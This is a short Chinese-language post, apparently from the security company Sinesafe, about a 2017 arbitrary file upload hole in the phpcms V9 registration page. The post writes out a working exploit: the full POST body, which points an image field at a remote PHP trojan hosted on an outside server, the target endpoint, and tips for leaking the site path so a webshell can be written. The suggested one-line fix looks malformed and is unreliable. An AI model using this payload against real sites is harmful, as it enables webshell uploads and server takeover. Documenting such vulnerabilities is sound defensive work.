近期phpcms爆高危漏洞,4月-5月之间很多用phpcms代码的网站,都被黑客入侵并篡改。
该漏洞影响phpcms V9 所有版本,包括现在最新9.6版本,这个漏洞早在2016年的10月份内部已经公开,Sine安全早已针对此漏洞研发修复补丁,老客户的网站已修复phpcms漏洞。
2017年4月,此漏洞在互联网上公开,引起许多小黑帽的注意,导致大多数网站都沦为他们练手的战场,许多客户的网站被跳转,被挂马,以及百度快照被劫持,网站的百度快照都是一些非法页面。
漏洞利用的是通过网站的注册页面,发送POST数据过去 ,可以绕过直接上传任意脚本文件(PHP木马文件),从而被攻击者利用,并拿到服务器管理者权限,危害巨大。
代码如下:
POST数据:
siteid=1&modelid=11&username=sinesafe&password=sinesafe&email=sinesafe@qq.com&info[content]=<img src=http://sinesafe.com/websafe/php_sine.php#.jpg>&dosubmit=1&protocol=
POST地址:
www.网站地址.com/index.php?m=member&c=index&a=register&siteid=1
USERNAME 和 Email 的值尽量不要跟之前注册的一样,一样的话也可以正常下载到目标,但是不会爆出网站的路径,没有网站路径就写不了木马文件。
在上传方面,代码里并没有做严格的安全过滤,导致漏洞可以#利用,并上传以图片格式的木马文件,漏洞修复建议:
在 /phpcms/libs/classes/attachment.class.php 文件,加上代码过滤检查
if(!preg_match(”/($ext)/i”,$filename)) continue;
程序代码漏洞,这需要有安全意识的程序员才能修复得了,通常是在出现被挂马以后才知道要针对哪方面入手修复,也可以通过安全公司来解决,国内也就Sinesafe和绿盟等安全公司 比较专业。